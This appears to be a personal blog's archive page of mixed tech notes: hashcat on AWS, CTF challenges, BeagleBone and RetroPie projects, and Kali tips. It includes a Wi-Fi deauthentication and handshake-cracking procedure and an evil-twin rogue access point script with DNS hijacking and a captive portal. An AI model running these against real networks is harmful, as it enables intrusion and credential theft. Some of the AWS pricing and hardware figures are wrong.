Month: November 2019

Few months ago, I have installed GTX 1060 ti 6GB on desktop PC for using hashcat, but I found out that I rarely used hashcat to crack hash keys. Thus I decided to use AWS for cracking hashes. Kali (2019.03) distro is already in AWS market store. I selected US-West (Oregon) region with GPU enabled instance. I am using p2.xlarge and p3.2xlarge instances on Kali ; those are generally turned off and fair enough for my purposes.

It costs 0.9 CAD/h to 31,218 CAD/h with the Pay-As-You-Go rates depending on performance. The entry option is p2.xlarge(1* Tesla V100, 4 * vCPUs, 61GB RAM), and the highend option is p3dn.24xlarge(8 * Tesla V100, 256GB GPU Mem, 96 * vCPU with 768GB Mem)

https://aws.amazon.com/ec2/instance-types/p2/
https://aws.amazon.com/ec2/instance-types/p3/

I created 4 forensic challenges for CTF event. These might be interesting for someone who enjoy learning something.

Problems

1) What the *uck, where is my password?
Investigate file and identify stolen password

2) Hidden Personal Information
Find the leaked personal information

3) Meeting place
Investigate criminal’s meeting place and secure code

4) Ransome
Investigate raw disk image and recover those infected files

https://drive.google.com/file/d/1pvkNyMU_wDtySpxY1ms8onfoYSxNXhkz/view?usp=sharing

Component

• 1 x BeagleBone Black
• 1 x BreadBoard
• 1 x Blue LED
• 2 x Button
• 1 x 330Ω Resistor
• 2 x 1K Resistor
• 7 x Connection cables

P9_2 – 330Ω – LED (10mm) – P9_14
P9_2 – 1KΩP – 9_23(GIPO_49) – Button 1
P9_4 – Button 1
P9_4 – Button 2
P9_2 – 1KΩP – 9_27(GIPO_115) – Button 2

Before I found out what Fritzing is, drawing connection map is time consuming work. This tool is intuitive and ease-to-use. We can import libraries for BeagleBone Black here.

Working Code

We can manipulate brightness of LED by implementing Pulse Width Modulation(PWM), thanks for the Python, integrating these modules were not too difficult. There are two buttons between circuits, it modifies Duty Cycles to change the LED brightness.

Connection

10mm LED, 1K Ω Resistor, Breadboard with connection cables

P8_2=>GND
P8_10=>LED OUT

Code

#!/usr/bin/python
import Adafruit_BBIO.GPIO as GPIO
import time
GPIO.setup("P8_10", GPIO.OUT)
while True:
     GPIO.output("P8_10", GPIO.HIGH)
     time.sleep(0.5)
     GPIO.output("P8_10", GPIO.LOW)
     time.sleep(0.5)

As Raspberry 4 is delivering form China, I turned legacy little gadget into retro gamebox just for fun. It could not too complex, but there were some trial errors as always.

PrE-requisite

Raspberry 3b+
SENS Game controllers
16GB+ Micro SD Card
Retropie images
Game Roms

Configuration

Most of setting can be left unchanged, but there might be some madatory changes required depending on environment.

setting:configuration->raspi-config->1.change user password
setting:configuration->raspi-config->2.network options->WiFi-setting
(need to make sure that the password for WiFi can not have a special character @)
setting:configuration->raspi-config->5.interfacing option->enable ssh

After rebooting, then install the lightdm for autologin
$sudo apt-get install lightdm
setting: configuration->raspi-config->3.boot options->4.desktop autologin

If HDMI interface is default for sound, there is no issue but when using 3.5mm analogue audio out, it requires additional configuration changes.

To get audio through the 3.5 jack: Retropie configuration > Audio > select option 2 (headphones – 3.5mm jack) > OK > restart system

Additional settings

for un-archiving Rom packages;
$apt-get install unrar-free p7zip

Downloading Roms

https://nblog.org/rompacks-romsets/
https://raspberrytips.com/download-retropie-roms/
https://github.com/RetroPie/RetroPie-Setup/wiki/First-Installation

Procedure

Scanning->Capturing/De-authorization handshake packet->Cracking

Scanning

#airmon-ng check kill
#airmon-ng start wlan0mon
#airodump-ng wlan0mon

Capturing/De-authorization

#airodump-ng –bssid MACADDRESS -c Channel –write DUMPFILE wlanmon0
#aireplay-ng –deauth 100 -a MACADDRESS wlanmon0 (for deauthorization if required)

Cracking/Brute-forcing

#aircrack-ng DUMPFILE -w WORDLIST

dnsmasq.conf

interface=wlan0mon
address=/#/10.10.12.1
dhcp-range=10.10.12.2,10.10.12.254,255.255.255.0,1h
dhcp-option=3,10.10.12.1
dhcp-option=6,10.10.12.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

Procedure.sh

sudo airmon-ng check kill
sudo airmon-ng start wlan0
sudo rghostapd -i "wlan0mon" --ssid "secured" -c 6 -pK "SecretPassword"
sudo ifconfig wlan0mon up 10.10.12.1 netmask 255.255.255.0
sudo route add -net 10.10.12.0 netmask 255.255.255.0 gw 10.10.12.1
sudo killall dnsmasq
sudo dnsmasq -C /root/ghostap/dnsmasq.conf -d


sudo sysctl net.ipv4.ip_forward=1
sudo iptables-legacy --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
sudo iptables-legacy --append FORWARD --in-interface wlan0mon -j ACCEPT
#config : /etc/nginx/sites-enabled/captive_portal
sudo service nginx start

When failing apt-get update or upgrade

$sudo apt-get install ntpdate
$sudo ntpdate -v pool.ntp.org 

Enabling Promiscuous mode

 sudo ifconfig eth0 promisc

auto starting ssh service

systemctl enable ssh.service

VM fusion full resolution for linux(kali)

apt-get install open-vm-tools-desktop fuse

https://www.kali.org/docs/virtualization/install-vmware-tools-kali-guest/

Proxy switcher

https://null-byte.wonderhowto.com/how-to/use-burp-foxyproxy-easily-switch-between-proxy-settings-0196630/

“inconsistent use of tabs and spaces in indentation” in Python

$autopep8 -i my_file.py

vmmon not found

vmware-modconfig --console --install-all
ref:https://kb.vmware.com/s/article/1002411

Set timezone
$sudo timedatectl set-timezone list
$sudo timedatectl set-timezone America/Edmonton